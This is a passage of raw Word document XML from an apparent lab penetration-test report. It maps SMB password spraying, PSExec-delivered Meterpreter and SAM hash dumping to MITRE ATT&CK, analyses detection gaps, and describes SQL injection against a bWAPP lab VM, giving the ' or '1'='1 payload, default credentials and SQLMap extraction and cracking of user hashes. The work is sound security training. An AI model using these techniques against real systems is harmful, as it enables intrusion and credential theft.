              <w:t>ATT&amp;CK ID</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4B7F55E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481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004D0D9D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="6BEE1C7E"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AFD8EC1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1110.003</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5A5462" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Brute Force: Password Spraying</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0641E61" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SMB login module tested credentials against port 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3036DD5E"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8C802E3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1021.002</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2394B6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Services: SMB/Admin Shares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0CC038" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PSExec delivered Meterpreter payload over SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0BAE4074"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3D71B64" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078</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E42A6AB" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Valid Accounts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E00B1B5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Recovered Administrator credentials used to gain access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="077E1CB0"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6EB517F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1003.002</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CA2472E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OS Credential Dumping: SAM</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891ABF0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> extracted NTLM hashes from Windows SAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C1F4137" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26159414" w14:textId="5381849F" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE867A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The brute force generated multiple failed logon events (Event ID 4625) followed by a successful logon (Event ID 4624). PSExec created a detectable service installation event (Event ID 7045). Without a SIEM aggregating and correlating these events, all activity went undetected. Phishing-resistant MFA on administrative accounts would have prevented credential-based access entirely [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9CD8A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49AEEB18" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567DC7E4" w14:textId="13270FAF" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Exploit 3 — SQL Injection Database Exfiltration (VM-3: bWAPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A5D4E" w14:textId="4F300F21" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A4D42" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The bWAPP application on 192.168.56.105 ran Apache 2.2.8 and PHP 5.2.4 — both critically outdated. The SQL Injection (GET/Search) function accepted unsanitised user input directly </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>into a MySQL query, constituting an OWASP Top 10 A03:2021 Injection vulnerability [7] — one of the most prevalent and impactful web application weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2A13D"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2636DB4A"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66B066D7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D851A9" wp14:editId="653672C2">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="4562130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13079" name="Picture 45621307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664377"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10: bWAPP dashboard — authenticated as bee [BWAPP_15_dashboard.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21875C0F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E36B70" w14:textId="6D074306" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Exploitation and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D862D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Following authentication (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>bee:bug</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">), the SQL Injection search module was selected. The payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>' or '1'='1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was submitted, returning the complete movies table — confirming a boolean-based SQL injection vulnerability. The PHPSESSID cookie (673309d3596ad0b92acaa9c84bcb0003) was extracted via the Firefox Storage Inspector. SQLMap [8] was configured with this cookie and executed against the endpoint, identifying four injection types: boolean-based blind, error-based, time-based blind, and UNION query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293121B3"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765C87CA"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5CE69017" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="284C7AC8" wp14:editId="5F3DE992">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="17233747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74734" name="Picture 172337473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32A7D0"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11: Manual SQLi — full movies table returned [BWAPP_17_sqli_success.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56D2372F"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6CD1C9CA"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599BE801" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2641BB8A" wp14:editId="28083DF7">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="13675369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36979" name="Picture 136753697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2057B6"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12: SQLMap — four databases enumerated including bWAPP [BWAPP_20_sqlmap.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47374112" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC81E97" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SQLMap subsequently dumped the bWAPP users table, exposing two complete user records including email addresses, login names, SHA1 hashes, and secret answers. An offline dictionary attack cracked both hashes, recovering plaintext password 'bug' for all accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A5288"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438DD8A0"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4B4D16C7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABC3B07" wp14:editId="229ACF1D">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="13227648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64864" name="Picture 132276486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6FB55F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Figure 13: SQLMap users table dump — credentials and cracked passwords [BWAPP_22_users_dump.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33BC472B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59031CAE" w14:textId="6F29D2E1" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.3 MITRE ATT&amp;CK Mapping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4"/>
        <w:gridCol w:w="2808"/>
        <w:gridCol w:w="4814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="49C8F2A9"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77013CE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</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1B4A272" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481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19C8DCBD" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0313F5E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D12197B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</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686696" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit Public-Facing Application</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347FB5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL injection via unsanitised GET parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="01812CB1"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FCE87A0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1213</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135C8A4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data from Information Repositories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5EF8F2" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full database enumerated and extracted via SQLMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="67C3D8D4"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39C2E6F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1552.001</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AE31A4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credentials in Files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B3334D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
